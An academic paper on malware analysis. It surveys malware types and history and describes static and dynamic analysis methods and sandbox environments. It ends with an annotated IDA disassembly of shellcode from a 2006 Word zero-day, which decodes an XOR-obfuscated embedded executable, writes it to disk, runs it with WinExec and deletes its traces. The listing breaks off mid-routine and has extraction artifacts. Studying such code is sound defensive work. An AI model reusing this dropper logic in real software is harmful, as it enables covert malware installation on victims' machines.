1 IJAEST Volume No 2 Issue No 1 Malware Analysis Using Assembly Level Program 000 012

Malware Analysis Using Assembly Level
Program

S.Murugan
ACTS Team coordinator ,
CDAC Knowledge Park,
No 1 Old Madras Road,Bangalore,
Karnataka,INDIA
Murugan.sethu@gmail.com

Dr.K.Kuppusamy,
Associate professor
ComputerScience and Engg Dept ,
AlagappaUniversity,Karaikudi,
Tamilnadu,INDIA
kkdiksamy@yahoo.com

Abstract-Malware are exciting types of programs to experiment
with. One of the advantages of using assembly language is that
you can both create and combat such programs. Generally, all
EFFECTIVE Malware are written in assembly language. It
would be difficult, if not impossible, to do this with other
languages (except for C); although it is quite easy to write a self-
reproducing program in any language. Viruses have been used
to kill other viruses. One could conceive of viruses and worms
that run around through a system carrying out useful tasks
without direct intervention of particular users. The ability to
forensically analyze malicious software is becoming an
increasingly important discipline in the field of Digital
Forensics. This is because malware is becoming stealthier,
targeted, profit driven, managed by criminal organizations,
harder to detect and much harder to analyze. Malware analysis
requires a considerable skill set to look into deep malware
internals when it is designed specifically to detect and hold back
such attempts. A surplus of tools are available to the analyst
including debuggers, disassemblers, de-compilers, memory
dumpers, unpackers as well as many other tools common to the
discipline of software engineering. All of these tools require
niche expertise and a thorough understanding of the principles
of their operation and the computers they execute on.
1. INTRODUCTION
Malware, short for malicious software, is software
designed to infiltrate a computer system without the owner's
informed consent. The expression is a general term used by
computer professionals to mean a variety of forms of hostile,
intrusive, or annoying software or program code. The term
computer virus" is sometimes used as a catch-all phrase to
include all types of malware, including true viruses.
Software is considered to be malware based on the
perceived intent of the creator rather than any particular
features. Malware includes computer viruses, worms, trojan
horses, spyware, dishonest adware, crimeware, most rootkits,
and other malicious and unwanted software. In law, malware
is sometimes known as a computer contaminant, for instance
in the legal codes of several U. S. states, including California
and West Virginia. Malware is not the same as defective
software, which is software that has a legitimate purpose but
contains harmful bugs.
Preliminary results from Symantec published in
2008 suggested that "the release rate of malicious code and
other unwanted programs may be exceeding that of
legitimate software applications." According to F-Secure,
"As much malware [was] produced in 2007 as in the previous
20 years altogether." Malware's most common pathway from
criminals to users is through the Internet: primarily by e-mail
and the World Wide Web.
The prevalence of malware as a vehicle for
organized Internet crime, along with the general inability of
traditional anti-malware protection platforms (products) to
protect against the continuous stream of unique and newly
produced malware, has seen the adoption of a new mindset
S. Murugan et al. / (IJAEST) INTERNATIONAL JOURNAL OF ADVANCED ENGINEERING SCIENCES AND TECHNOLOGIES
Vol No. 2, Issue No. 1, 001 - 012
ISSN: 2230-7818 @ 2011 http://www.ijaest.iserp.org. All rights Reserved. Page 1
I
J
A
E
S
T
for businesses operating on the Internet: the acknowledgment
that some sizable percentage of Internet customers will
always be infected for some reason or another, and that they
need to continue doing business with infected customers. The
result is a greater emphasis on back-office systems designed
to spot fraudulent activities associated with advanced
malware operating on customers' computers.
On March 29, 2010, Symantec Corporation named
Shaoxing, China as the world's malware capital.
Sometimes, malware is disguised as genuine
software, and may come from an official site. Therefore,
some security programs, such as McAfee may call malware
"potentially unwanted programs" or "PUP".
Many early infectious programs, including the first
Internet Worm and a number of MS-DOS viruses, were
written as experiments or pranks. They were generally
intended to be harmless or merely annoying, rather than to
cause serious damage to computer systems. In some cases,
the perpetrator did not realize how much harm their creations
would do.

Young programmers learning about viruses and
their techniques wrote them for the sole purpose that they
could or to see how far it could spread. As late as 1999,
widespread viruses such as the Melissa virus appear to have
been written chiefly as pranks.
Hostile intent related to vandalism can be found in
programs designed to cause harm or data loss. Many DOS
viruses, and the Windows ExploreZip worm, were designed
to destroy files on a hard disk, or to corrupt the file system by
writing invalid data to them. Network-borne worms such as
the 2001 Code Red worm or the Ramen worm fall into the
same category. Designed to vandalize web pages, worms
may seem like the online equivalent to graffiti tagging, with
the author's alias or affinity group appearing everywhere the
worm goes.

Another strictly for-profit category of malware has
emerged in spyware -- programs designed to monitor users
web browsing, display unsolicited advertisements, or redirect
affiliate marketing revenues to the spyware creator. Spyware
programs do not spread like viruses; they are, in general,
installed by exploiting security holes or are packaged with
user-installed software, such as peer-to-peer applications.
The best-known types of malware, viruses and
worms, are known for the manner in which they spread,
rather than any other particular behavior. The term computer
virus is used for a program that has infected some executable
software and that causes that when run; spread the virus to
other executables. Viruses may also contain a payload that
performs other actions, often malicious. A worm, on the
other hand, is a program that actively transmits itself over a
network to infect other computers. It too may carry a
payload. These definitions lead to the observation that a virus
requires user intervention to spread, whereas a worm spreads
itself automatically. Using this distinction, infections
transmitted by email or Microsoft Word documents, which
rely on the recipient opening a file or email to infect the
system, would be classified as viruses rather than worms.
Before Internet access became widespread, viruses
spread on personal computers by infecting the executable
boot sectors of floppy disks. By inserting a copy of it into the
machine code instructions in these executables, a virus causes
itself to be run whenever a program is run or the disk is
booted. Early computer viruses were written for the Apple II
and Macintosh, but they became more widespread with the
dominance of the IBM PC and MS-DOS system. Executable-
infecting viruses are dependent on users exchanging software
or boot-able floppies, so they spread rapidly in computer
hobbyist circles.
The first worms, network-borne infectious
programs, originated not on personal computers, but on
multitasking UNIX systems. The first well-known worm was
the Internet Worm of 1988, which infected SunOS and VAX
Vol No. 2, Issue No. 1, 001 - 012
I
J
A
E
S
T
BSD systems. Unlike a virus, this worm did not insert itself
into other programs. Instead, it exploited security holes
(vulnerabilities) in network server programs and started itself
running as a separate process. This same behavior is used by
today's worms as well.

With the rise of the Microsoft Windows platform in
the 1990s, and the flexible macros of its applications, it
became possible to write infectious code in the macro
language of Microsoft Word and similar programs. These
macro viruses infect documents and templates rather than
applications (executables), but rely on the fact that macros in
a Word document are a form of executable code.

Today, worms are most commonly written for the
Windows OS, although a few like Mare-D and the Lion
worm are also written for Linux and UNIX systems. Worms
today work in the same basic way as 1988's Internet Worm:
they scan the network and leverage vulnerable computers to
replicate. Because they need no human intervention, worms
can spread with incredible speed.

2. INTRODUCTION
Malware as software whose intent is malicious, or
whose effect is malicious. Analysis of malicious software is
essential for computer security professionals and digital
forensic analysts and is emerging as an important field of
research. Malware is often targeted at organizations and is
increasingly using anti-forensics techniques to prevent
detection and analysis. Commercial Anti-Virus (AV)
software is often limited in its ability to detect and remove
malware. It is highly unlikely to detect new malware that is
unleashed on the internet, corporate intranet or that has been
customized to target specific networks. It is also unlikely to
detect malware that has been customized to target specific
networks.

It is undeniable that there is a digital arms race
between malware developers and malware researchers. As
soon as a technique is developed by one side, the other side
implements a counter measure. Two of the major trends are
that attackers are increasingly motivated by financial gain
and that there are indications that malware development is
becoming increasingly commercialized and developed by
professionals with extensive software engineering abilities.
Another trend is that malware has an increasing variety of
techniques available to hinder the forensic analyst. This can
include detection of the tools used by the forensic analyst and
prevention of analysis via anti-debugging, anti-disassembly,
anti-emulation, anti-memory dumping, incorporation of fake
signatures and code obfuscation.

Signature based detection of malware is dependent
upon an analyst having already analyzed the malware and
extracted a signature as well as the end user having updated
their malware signature file.

Although these techniques go some way in
protecting a system they are far from infallible and only of
minor assistance to the forensic analyst, especially if the
malware is new or has been customized. The increasing
availability of high speed network Internet connections has
also enabled the rapid production and dissemination of the
malware. All of these factors are contributing to increasing
numbers of network borne malware with respect to volume,
variety and complexity. Security professionals in the field
need to know how to determine if they are the target of an
attack and how to eradicate or mitigate threats from their
systems. This process of threat reduction can be assisted if
security professionals have up to date methodologies and
skill sets at their disposal.

Vol No. 2, Issue No. 1, 001 - 012
I
J
A
E
S
T
3. THE PROBLEM WITH MALWARE ANALYSIS
The spectrum of malware that represents a real
threat is expansive. A non exhaustive list includes root kits,
worms, bots, trojans, logic bombs, viruses, phishing, spam,
spyware, adware, key loggers and backdoors. No computing
platform or environment is immune to these threats.
Traditionally, malware is thought of as a virus or worm that
has a single function or payload. The resulting
countermeasure for traditional malware has been the
employment of a removal tool that was initiated by signature
detection or by recognition of heuristics defined by specific
behaviors. These tended to be like the malware they were
responding to in that they were unitary or singular in purpose.
Modern network borne malware is increasingly
multi-partite in nature incorporating several infection vectors
and possible payloads in the one instance. Signature based
systems that rely on file hashing or similar functions that
uniquely identify malware based on file contents are
increasingly failing due to the mass customization allowable
with the use of frameworks .Furthermore, anti-forensic
techniques are widely deployed to obfuscate infection, hinder
detection and retard eventual removal of the malware. This
increasing complexity and entropy makes modern malware
analysis a significant undertaking that takes considerable
time, expertise and requires an extensive knowledge domain
either in an individual or in coverage provided by a team of
analysts.
Two fundamental techniques available to the analyst
are static and dynamic analysis. Static analysis does not
execute the code and the code is analyzed via disassemblies,
call graphs, searches for strings, library calls, and
reconstruction of data structures, enumerations and unions
within the code. This analysis technique is very time
consuming and easily hindered by anti-forensics in the form
of code obfuscation, packers and protectors which are
increasingly being used by malware authors.
Dynamic analysis, in contrast, does run the code and the
analyst observes its behavior and interaction with the host
and network via mechanisms such as registry, file and
network monitoring tools. This technique is generally much
easier to conduct than static analysis but is also easily
hindered by malware that can detect the use of an emulation
environment such as VMware or the use of debugging tools
such as IDA Pro. By detecting the use of these tools and
environments, the malware can change its behavior. Once
detected, the malware can decide not to run its true payload
and can run in a deceptive mode that makes it look like much
less of a threat.
It can delete itself together with any evidence, or if
it is running with the appropriate privileges, damage or
destroy the system that it is being run on or attached uses an
iterative and recursive technique that incorporates both the
static and dynamic analysis techniques to extract the full
functionality of the code in a recursive and iterative
technique that spirals into the analysis from the higher level
view to the more detailed view. This technique also
facilitates the opportunity to discover and mitigate anti
forensic techniques as the analysis process proceeds.

4. ANALYSIS PROCESS
A high level and simplistic view of the malware
analysis process is depicted in figure 1 below. It shows
malware as one of two inputs to the analysis methodology
process which produces a report as an output. The generated
results also feedback into the analysis methodology via an
assessment process which can be used to adjust the
methodology dynamically, or as a process improvement
mechanism. Legal and ethical constraints serve as a bounding
constraint to the process.

Vol No. 2, Issue No. 1, 001 - 012
I
J
A
E
S
T

Programming skills are vital for in depth analysis of
malware. Systems level programming, high level languages,
scripting and even assembly language programming are
important skills required to understand how malware is
implemented and how it takes advantage of vulnerabilities. It
is also an important skill set for the development of
customized tools and for scripting disassemblers and
debuggers. The poser of being able to script debuggers and
disassemblers should not be underestimated in a malware
analysis context. Many analysis tools now also allow
additional functionality to be added by allowing users to
write customized Dynamic Link Library (DLL) plugins or
scripting languages such as IDA Python which integrates
IDA Pro scripting with the Python scripting language.

Producers of malware also develop and utilize
advanced programming techniques and technologies such as
distributed computing to enable a competitive advantage over
detection software and techniques. Therefore, it is imperative
that a malware analyst also be well versed in cutting edge
technologies and techniques.

5. MALWARE ANALYSIS
An adaptive, eclectic choice of techniques is
required for analysis of malware. Various frameworks and
methodologies such as static and dynamic analysis exist for
the malware analyst to analyze malware such as
PaiMei. Static analysis is the examination of source code
logic and behaviors, whereas dynamic analysis is the
monitoring and observation of the code as it executes. Both
techniques have strengths. Obfuscation of code may render
static analysis null and void. However, dynamic execution of
that code segment may reveal the next code sections required
for further static analysis. Other common software
engineering techniques, such as profiling, tracing and
debugging are also available, applicable and have utility in
malware analysis. The diversity of malware modus operandi
requires a range of approaches and techniques to perform
successful dissection and analysis of the malware. The skills
needed to perform competent analysis are profound, highly
technical and are at the cutting edge of computer science.
A surplus of tools are available to the analyst
including debuggers, disassemblers, de-compilers, memory
dumpers, unpackers as well as many other tools common to
the discipline of software engineering. All of these tools
require niche expertise and a thorough understanding of the
principles of their operation and the computers they execute
on. However, whether or not the tools are forensically sound
and their use acceptable in a court of law is a matter that
needs to be seriously considered.

Some useful tools are available from hacking and
software cracking sites that would not be considered
forensically sound without considerable validation or black
box testing. Such tools could contain trojans and could easily
hide a malicious purpose. They may not be forensically
acceptable without significant due diligence on the part of the
person or organizations using these types of tools. Other
software cracking or reverse engineering sites have scripts
for debuggers that can be easily and readily examined. These
scripts are useful to extract the known algorithm for dealing
with particular packers or to mitigate particular anti-forensic
techniques used by creators of such software.
Vol No. 2, Issue No. 1, 001 - 012
I
J
A
E
S
T

Analysis of malware will typically require
configuring a complete virtual environment suitable for it to
run in, not only from an operating systems perspective, but
also the inclusion of network infrastructure and services.
Modern malware are increasingly network borne and network
enabled. So it may be necessary to provide an environment in
which the malware can utilize commonly used services such
as Domain Name System (DNS) server, Simple Mail
Transfer Protocol (SMTP) server or an Internet Relay Chat
(IRC) server. Establishment of this style of environment
allows for the malware initiating communications with these
services to allow the dynamic capture of target data to assist
in the dynamic analysis of malware.

This type of environment may be supported by a
virtualized environment using commercial virtualization
environments such as VMWare or Virtual PC.

It should be noted that because malware can contain
the ability to detect these virtualized environments as a result
of their hardware and software fingerprints, the ability to
configure real systems and devices may need serious
consideration. This will require the configuration of a
particular computing host environment, or network device or
other system administrative tasks in order to achieve this.
This type of environment would need strict control and
isolation to prevent the spread of malware.

6. CODE

seg000:00000000 ;
seg000:00000000 ; +------------------------------------------------------------------
-------+
seg000:00000000 ; This file is generated by The Interactive
Disassembler (IDA)
seg000:00000000 ; Copyright (c) 2006 by DataRescue sa/nv,
<ida@datarescue.com>
seg000:00000000 ; +------------------------------------------------------------------
-------+
seg000:00000000 ;
seg000:00000000 ; File Name : C:\Documents and
Settings\Administrator\Desktop\PLANNING REPORT 5-16-2006.doc
seg000:00000000 ; Format : Binary file
seg000:00000000 ; Base Address: 0000h Range: 0000h - 246F5h Loaded
length: 246F5h
seg000:00000000 ;
seg000:00000000 ; Authors: Michael Ligh and Ryan Smith
seg000:00000000 ;
seg000:00000000 ; This is a commented dissassembly of the Word 0-day
released in
seg000:00000000 ; mid-late May 2006. This document does not describe the
vulnerability
seg000:00000000 ; or malware that results from an infection.
seg000:00000000 ;
seg000:00000000
seg000:00000000
seg000:00000000 unicode macro page,string,zero
seg000:00000000 irpc c,<string>
seg000:00000000 db '&c', page
seg000:00000000 endm
seg000:00000000 ifnb <zero>
seg000:00000000 dw zero
seg000:00000000 endif
seg000:00000000 endm
seg000:00000000
seg000:00000000 .686p
seg000:00000000 .mmx
seg000:00000000 .model flat
seg000:00000000

seg000:00000000 ----------------------------------------------------------------------
-----
seg000:00000B2E
seg000:00000B2E ; The shellcode starts here. It uses Dino Dai
Zovi's PEB resolution method
seg000:00000B2E ; to load the base address of kernel32.dll. This
information will be
seg000:00000B2E ; used to locate the addresses of kernel32's
exports (because they
seg000:00000B2E ; are offsets from the base address).
seg000:00000B2E
seg000:00000B2E nop
seg000:00000B2F nop
Vol No. 2, Issue No. 1, 001 - 012
I
J
A
E
S
T
seg000:00000B30 mov eax, fs:off_30 ; load PEB address into
eax
seg000:00000B36 mov eax, [eax+0Ch]
seg000:00000B39 mov esi, [eax+1Ch]
seg000:00000B3C lodsd
seg000:00000B3D mov esi, [eax+8] ; kernel32.dll entry point
seg000:00000B40 jmp loc_DAF
seg000:00000B40
seg000:00000B40 ; At this point, the code jumps to loc_DAF,
which immediately calls sub_B45.
seg000:00000B40 ; In doing so, the call instruction sets EIP to
0x00000DB4 (offset in
seg000:00000B40 ; this file) and pushes it on the stack. Notably,
the first
seg000:00000B40 ; instruction in sub_B45 is to pop this address
into eax (see below)
seg000:00000B40
seg000:00000B45
seg000:00000B45 ; S U B R O U T I N E

seg000:00000B45
seg000:00000B45
seg000:00000B45 ; The first part of this code loads the address to
which EIP points
seg000:00000B45 ; into the eax register. If you look at
0x00000DB4, there isn't much,
seg000:00000B45 ; but a dword (0A2000h) and three unicode
strings of file names.
seg000:00000B45 ; The code uses the offset of these values from
EIP to reference them and
seg000:00000B45 ; builds a structure with pointers to them. The
same structure will be used
seg000:00000B45 ; to store addresses of all the kernel32 exports
later. In the code
seg000:00000B45 ; below, edi contains a pointer to the first
member of the structure.
seg000:00000B45
seg000:00000B45 sub_B45 proc near ; CODE XREF:
seg000:loc_DAFp
seg000:00000B45 pop eax
seg000:00000B46 sub esp, 200h
seg000:00000B4C mov edi, esp
seg000:00000B4E mov ebx, [eax] ; [eax] == 0A2000h
seg000:00000B50 mov [edi+4], ebx
seg000:00000B53 mov [edi+SCRATCH.hKernel32], esi ; entry
point of kernel32
seg000:00000B56 add eax, 4
seg000:00000B59 mov [edi+SCRATCH.String1], eax ; c:\~$
seg000:00000B5C add eax, 0Ch
seg000:00000B5F mov [edi+SCRATCH.String2], eax ; c:\~.exe
seg000:00000B62 add eax, 12h
seg000:00000B65 mov [edi+SCRATCH.String3], eax ; c:\~.exe
seg000:00000B6B push edi ; saves the scratch pad for
use within loc_BA1
seg000:00000B6C mov edi, esp
seg000:00000B6E xor edi, 0FFFFh
seg000:00000B74 dec edi
seg000:00000B77
seg000:00000B77 ; The next instructions search memory for the
original Word document's
seg000:00000B77 ; own filename. The last mov (above) places the
esp pointer into edi.
seg000:00000B77 ; The loop works by reading a dword from edi
and comparing it to the
seg000:00000B77 ; unicode equivalent of "oc". If it matches then
it begins to search
seg000:00000B77 ; for ".d" (which completes the ".doc"
extension). Otherwise,
seg000:00000B77 ; it decrements edi and grabs another dword.
When done, it jumps
seg000:00000B77 ; to loc_BA1.
seg000:00000B77
seg000:00000B77 loc_B77: ; CODE XREF:
sub_B45+39j
seg000:00000B77 ; sub_B45+45j ...
seg000:00000B78 cmp dword ptr [edi], 63006Fh ; "oc"
seg000:00000B7E jnz short loc_B77
seg000:00000B84 cmp dword ptr [edi], 64002Eh ; ".d"
seg000:00000B8A jnz short loc_B77
seg000:00000B8C push 0C8h
seg000:00000B91 pop ecx
seg000:00000B92 mov esi, edi
seg000:00000B94
seg000:00000B94 loc_B94: ; CODE XREF:
sub_B45+58j
seg000:00000B94 dec esi
seg000:00000B95 cmp dword ptr [esi], 5C003Ah
Vol No. 2, Issue No. 1, 001 - 012
I
J
A
E
S
T
seg000:00000B9B jz short loc_BA1 ; finished - jump to
loc_BA1
seg000:00000B9D loop loc_B94
seg000:00000B9F jmp short loc_B77 ; failed - start over again
from loc_B77

seg000:00000BA1 ; --------------------------------------------------------------------
-------
seg000:00000BA1
seg000:00000BA1 ; This is the section that fills the shellcode's
own structure
seg000:00000BA1 ; members with pointers to kernel32 exports.
Once again, edi contains
seg000:00000BA1 ; the pointer to the structure's first member, so
all [edi+xyz] are
seg000:00000BA1 ; references to the additional members. The
loop here consists of
seg000:00000BA1 ; pushing two parameters on the stack - a
dword hash of the function name
seg000:00000BA1 ; (probably hashed to obfuscate the functions it
imports) and the
seg000:00000BA1 ; entry point for kernel32.dll. Each iteration
calls resolve_func
seg000:00000BA1 ; for the actual work (see 0x00000D5B of this
file). When complete,
seg000:00000BA1 ; the code knows exactly where to find all the
system resources and
seg000:00000BA1 ; functions it needs.
seg000:00000BA1 ;
seg000:00000BA1 ; Note the xyz field in all the [edi+xyz]
operands are natively
seg000:00000BA1 ; numerical. My co-worker Ryan reversed the
resolve_func sub routine
seg000:00000BA1 ; and renamed them for readability.
seg000:00000BA1
seg000:00000BA1
seg000:00000BA1 loc_BA1: ; CODE XREF:
sub_B45+56j
seg000:00000BA1 dec esi
seg000:00000BA2 dec esi
seg000:00000BA3 pop edi
seg000:00000BA4 mov [edi+SCRATCH.szDOCFILENAME],
esi
seg000:00000BA7 push [edi+SCRATCH.hKernel32]
seg000:00000BAA push 0C0397ECh ; GlobalAlloc
seg000:00000BAF call resolve_func
seg000:00000BB4 mov [edi+SCRATCH.pGlobalAlloc], eax
seg000:00000BB7 push [edi+SCRATCH.hKernel32]
seg000:00000BBA push 7CB922F6h ; GlobalFree
seg000:00000BBF call resolve_func
seg000:00000BC4 mov [edi+SCRATCH.pGlobalFree], eax
seg000:00000BC7 push dword ptr [edi+8]
seg000:00000BCA push 7C0017BBh ; CreateFileW
seg000:00000BCF call resolve_func
seg000:00000BD4 mov [edi+SCRATCH.pCreateFileW], eax
seg000:00000BD7 push dword ptr [edi+8]
seg000:00000BDA push 0FFD97FBh ; CloseHandle
seg000:00000BDF call resolve_func
seg000:00000BE4 mov [edi+SCRATCH.pCloseHandle], eax
seg000:00000BE7 push dword ptr [edi+8]
seg000:00000BEA push 10FA6516h ; ReadFile
seg000:00000BEF call resolve_func
seg000:00000BF4 mov [edi+SCRATCH.pReadFile], eax
seg000:00000BF7 push dword ptr [edi+8]
seg000:00000BFA push 0E80A791Fh ; WriteFile
seg000:00000BFF call resolve_func
seg000:00000C04 mov [edi+SCRATCH.pWriteFile], eax
seg000:00000C07 push dword ptr [edi+8]
seg000:00000C0A push 0C2FFB03Bh ; DeleteFileW
seg000:00000C0F call resolve_func
seg000:00000C14 mov [edi+SCRATCH.pDeleteFileW], eax
seg000:00000C1A push 76DA08ACh ; SetFilePointer
seg000:00000C24 mov [edi+SCRATCH.pSetFilePointer], eax
seg000:00000C2A push 0E8AFE98h ; WinExec
seg000:00000C34 mov [edi+SCRATCH.pWinExec], eax
seg000:00000C3A push 99EC8974h ; CopyFileW
seg000:00000C44 mov [edi+SCRATCH.pCopyFileW], eax
seg000:00000C4A push 73E2D87Eh ; ExitProcess
seg000:00000C54 mov [edi+SCRATCH.pExitProcess], eax
seg000:00000C54
seg000:00000C54 ; Delete any previously existing files of the
same name. Recall these are
seg000:00000C54 ; two of the three unicode file names discussed
earlier.
seg000:00000C54
seg000:00000C57 push [edi+SCRATCH.String2] ; c:\~.exe
Vol No. 2, Issue No. 1, 001 - 012
I
J
A
E
S
T
seg000:00000C5A call [edi+SCRATCH.pDeleteFileW]
seg000:00000C5D push [edi+SCRATCH.String1] ; c:\~$
seg000:00000C60 call [edi+SCRATCH.pDeleteFileW]
seg000:00000C63
seg000:00000C63 ; The next 3 push instructions are preparing the
arguments for CopyFile.
seg000:00000C63 ; Top down, they are 0 (for overwriting
permission), destination
seg000:00000C63 ; file name, and source file name (derived by
the code's memory searching
seg000:00000C63 ; technique).
seg000:00000C63
seg000:00000C63 push 0
seg000:00000C65 push [edi+SCRATCH.String1] ; c:\~$
seg000:00000C68 push [edi+SCRATCH.szDOCFILENAME]
seg000:00000C6B call [edi+SCRATCH.pCopyFileW]
seg000:00000C6E
seg000:00000C6E ; The next 7 push instructions are preparing the
arguments for CreateFile.
seg000:00000C6E ; Despite the function name, this only opens an
already existing file (in
seg000:00000C6E ; particular an exact copy of the original Word
document now at c:\~$ after
seg000:00000C6E ; CopyFile).
seg000:00000C6E
seg000:00000C6E push 0
seg000:00000C70 push 80h
seg000:00000C75 push 3
seg000:00000C77 push 0
seg000:00000C79 push 0
seg000:00000C7B push 80000000h
seg000:00000C80 push [edi+SCRATCH.String1] ; c:\~$
seg000:00000C83 call [edi+SCRATCH.pCreateFileW]
seg000:00000C86
seg000:00000C86 ; This is where it gets a little interesting. The
code places its read
seg000:00000C86 ; pointer at EOF and moves -4 bytes (back
toward the beginning). This
seg000:00000C86 ; is the offset to where the output file begins. It
reads data into
seg000:00000C86 ; a buffer, makes a call to allocate storate on
the heap, then resets the
seg000:00000C86 ; read pointer and does a second iteration with
different offsets. Once it
seg000:00000C86 ; has collected all the data, it proceeds to
loc_CEA for processing.
seg000:00000C86
seg000:00000C86 mov [edi+SCRATCH.hInputFile], eax
seg000:00000C89 push FILE_END
seg000:00000C8B push 0
seg000:00000C8D push -4
seg000:00000C8F push [edi+SCRATCH.hInputFile]
seg000:00000C92 call [edi+SCRATCH.pSetFilePointer]
seg000:00000C95 push 0
seg000:00000C97 lea ebx, [edi+SCRATCH.endMarker]
seg000:00000C9D push ebx
seg000:00000C9E push 4
seg000:00000CA0 lea ebx, [edi+SCRATCH.field_4]
seg000:00000CA3 push ebx
seg000:00000CA4 push [edi+SCRATCH.hInputFile] ; handle to
c:\~$
seg000:00000CA7 call [edi+SCRATCH.pReadFile]
seg000:00000CAA push [edi+SCRATCH.field_4]
seg000:00000CAD push 40h ; '@' ; allocate 40 bytes on
heap
seg000:00000CAF call [edi+SCRATCH.pGlobalAlloc]
seg000:00000CB2 mov [edi+SCRATCH.pMallocdBuff0], eax
seg000:00000CB5 mov ebx, [edi+SCRATCH.field_4]
seg000:00000CB8 add ebx, 4
seg000:00000CBB not ebx
seg000:00000CBD inc ebx
seg000:00000CBE push 2 ; new offsets and starting loc
seg000:00000CC0 push 0
seg000:00000CC2 push ebx
seg000:00000CC3 push [edi+SCRATCH.hInputFile]
seg000:00000CC6 call [edi+SCRATCH.pSetFilePointer]
seg000:00000CC9 push 0
seg000:00000CCB lea ebx, [edi+SCRATCH.endMarker]
seg000:00000CD1 push ebx
seg000:00000CD2 push [edi+SCRATCH.field_4]
seg000:00000CD5 push [edi+SCRATCH.pMallocdBuff0]
seg000:00000CD8 push [edi+SCRATCH.hInputFile]
seg000:00000CDB call [edi+SCRATCH.pReadFile]
seg000:00000CDE push [edi+SCRATCH.hInputFile]
seg000:00000CE1 call [edi+SCRATCH.pCloseHandle]
seg000:00000CE4 mov eax, [edi+SCRATCH.field_4]
seg000:00000CE7 mov ebx, [edi+SCRATCH.pMallocdBuff0]
seg000:00000CEA
seg000:00000CEA ; This section of code loops through all bytes in
the buffer filled by the
seg000:00000CEA ; previous ReadFile() functions and xor's them
with 0x81. In the instructions,
seg000:00000CEA ; ebx is the array index and eax is the counter.
This xor-encoding
Vol No. 2, Issue No. 1, 001 - 012
I
J
A
E
S
T
seg000:00000CEA ; scheme obfuscates the code and could help
evade IDS detection in
seg000:00000CEA ; some cases.
seg000:00000CEA
seg000:00000CEA loc_CEA: ; CODE XREF:
sub_B45+1ADj
seg000:00000CEA xor byte ptr [ebx], 81h ; The output file is
static xor'd with 0x81
seg000:00000CED inc ebx
seg000:00000CEE dec eax
seg000:00000CEF cmp eax, 0
seg000:00000CF2 jnz short loc_CEA
seg000:00000CF4
seg000:00000CF4 ; At this point, the decoded payload exists on
the heap. What to do with it?
seg000:00000CF4 ; Write it to disk of course! And use the last
remaining unicode string as its
seg000:00000CF4 ; file name.
seg000:00000CF4
seg000:00000CF4 push 0
seg000:00000CF6 push 80h
seg000:00000CFB push 2
seg000:00000CFD push 0
seg000:00000CFF push 0
seg000:00000D01 push 40000000h
seg000:00000D06 push [edi+SCRATCH.String2] ; c:\~.exe
seg000:00000D09 call [edi+SCRATCH.pCreateFileW]
seg000:00000D0C mov [edi+SCRATCH.hFileTwo], eax
seg000:00000D0F push 0
seg000:00000D11 lea ebx, [edi+SCRATCH.endMarker]
seg000:00000D17 push ebx
seg000:00000D18 push [edi+SCRATCH.field_4]
seg000:00000D1B push [edi+SCRATCH.pMallocdBuff0]
seg000:00000D1E push eax
seg000:00000D1F call [edi+SCRATCH.pWriteFile]
seg000:00000D22 push 0
seg000:00000D24 lea ebx, [edi+SCRATCH.endMarker]
seg000:00000D2A push ebx
seg000:00000D2B push 0FFh
seg000:00000D30 push [edi+SCRATCH.szDOCFILENAME]
seg000:00000D33 push [edi+SCRATCH.hFileTwo]
seg000:00000D36 call [edi+SCRATCH.pWriteFile]
seg000:00000D39 push [edi+SCRATCH.hFileTwo]
seg000:00000D3C
seg000:00000D3C ; The code is cleaning up by closing its open
file handles and releasing
seg000:00000D3C ; the heap back to the OS.
seg000:00000D3C
seg000:00000D3C call [edi+SCRATCH.pCloseHandle]
seg000:00000D3F push [edi+SCRATCH.pMallocdBuff0]
seg000:00000D42 call [edi+SCRATCH.pGlobalFree]
seg000:00000D45
seg000:00000D45 ; Here the code calls WinExec() to launch the
new executable it has just
seg000:00000D45 ; written to disk. Then it deletes the copy of the
original Word doc that
seg000:00000D45 ; it saved to c:\~$ and exits.
seg000:00000D45
seg000:00000D45 push 0
seg000:00000D47 push [edi+SCRATCH.String3] ; c:\~.exe
seg000:00000D4D call [edi+SCRATCH.pWinExec]
seg000:00000D50 push [edi+SCRATCH.String1] ; c:\~$
seg000:00000D53 call [edi+SCRATCH.pDeleteFileW]
seg000:00000D56 push 0
seg000:00000D58 call [edi+SCRATCH.pExitProcess]
seg000:00000D58 sub_B45 endp
seg000:00000D58
seg000:00000D5B
seg000:00000D5B ; S U B R O U T I N E

seg000:00000D5B
seg000:00000D5B ; Attributes: bp-based frame
seg000:00000D5B
seg000:00000D5B resolve_func proc near ; CODE XREF:
sub_B45+6Ap
seg000:00000D5B ; sub_B45+7Ap ...
seg000:00000D5B
seg000:00000D5B arg_0 = dword ptr 8
seg000:00000D5B arg_4 = dword ptr 0Ch
seg000:00000D5B
seg000:00000D5B push ebp ; standard function prologue
seg000:00000D5C mov ebp, esp ; standard function
prologue
seg000:00000D5E push edi ; save the scratch pad again
seg000:00000D5F mov edi, [ebp+arg_0] ; move arg[0] into edi
seg000:00000D62 mov ebx, [ebp+arg_4] ; move arg[1] into
ebx
seg000:00000D65 push esi
seg000:00000D66 mov esi, [ebx+3Ch]
seg000:00000D69 mov esi, [esi+ebx+78h]
seg000:00000D6D add esi, ebx
seg000:00000D6F push esi
seg000:00000D70 mov esi, [esi+20h]
seg000:00000D73 add esi, ebx
Vol No. 2, Issue No. 1, 001 - 012
I
J
A
E
S
T
seg000:00000D75 xor ecx, ecx
seg000:00000D77 dec ecx
seg000:00000D78
seg000:00000D78 loc_D78: ; CODE XREF:
resolve_func+36j
seg000:00000D78 inc ecx
seg000:00000D79 lodsd
seg000:00000D7A add eax, ebx
seg000:00000D7C push esi
seg000:00000D7D xor esi, esi
seg000:00000D7F
seg000:00000D7F loc_D7F: ; CODE XREF:
resolve_func+31j
seg000:00000D7F movsx edx, byte ptr [eax]
seg000:00000D82 cmp dh, dl
seg000:00000D84 jz short loc_D8E
seg000:00000D86 ror esi, 0Dh ; rotate right function
seg000:00000D89 add esi, edx
seg000:00000D8B inc eax
seg000:00000D8C jmp short loc_D7F
seg000:00000D8E ; -------------------------------------------------------------------
--------
seg000:00000D8E
seg000:00000D8E loc_D8E: ; CODE XREF:
resolve_func+29j
seg000:00000D8E cmp edi, esi
seg000:00000D90 pop esi
seg000:00000D91 jnz short loc_D78
seg000:00000D93 pop edx
seg000:00000D94 mov ebp, ebx
seg000:00000D96 mov ebx, [edx+24h]
seg000:00000D99 add ebx, ebp
seg000:00000D9B mov cx, [ebx+ecx*2]
seg000:00000D9F mov ebx, [edx+1Ch]
seg000:00000DA2 add ebx, ebp
